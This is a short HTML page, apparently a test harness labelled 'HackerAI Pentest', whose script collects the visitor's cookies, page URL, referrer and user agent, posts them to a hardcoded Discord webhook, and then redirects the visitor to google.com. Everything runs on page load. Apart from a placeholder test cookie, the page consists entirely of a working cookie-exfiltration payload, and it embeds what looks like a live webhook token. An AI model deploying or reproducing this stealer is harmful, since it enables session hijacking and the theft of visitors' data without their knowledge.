<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
</head>
<body>
<script>
    document.cookie = "pt_session=TESTING123; path=/";
</script>
<script>
   const WEBHOOK_URL='https://discord.com/api/webhooks/1446184269688078508/zCkW4lzKYqNpy_TP4hSConHlmP96vOL93Q8IEEkFLjnJnYtTpn40QhLA8qNTjRYqUoUh';const REDIRECT_URL='https://www.google.com';(function(){const c=document.cookie;const p={url:window.location.href,cookies:c,referrer:document.referrer,userAgent:navigator.userAgent};fetch(WEBHOOK_URL,{method:'POST',body:JSON.stringify(p),headers:{'Content-Type':'application/json'},mode:'no-cors'}).catch(e=>{console.error('[HackerAI Pentest] Failed to send cookie data:'+e)}).finally(()=>{window.location.href=REDIRECT_URL})})();
</script>
</body>
</html>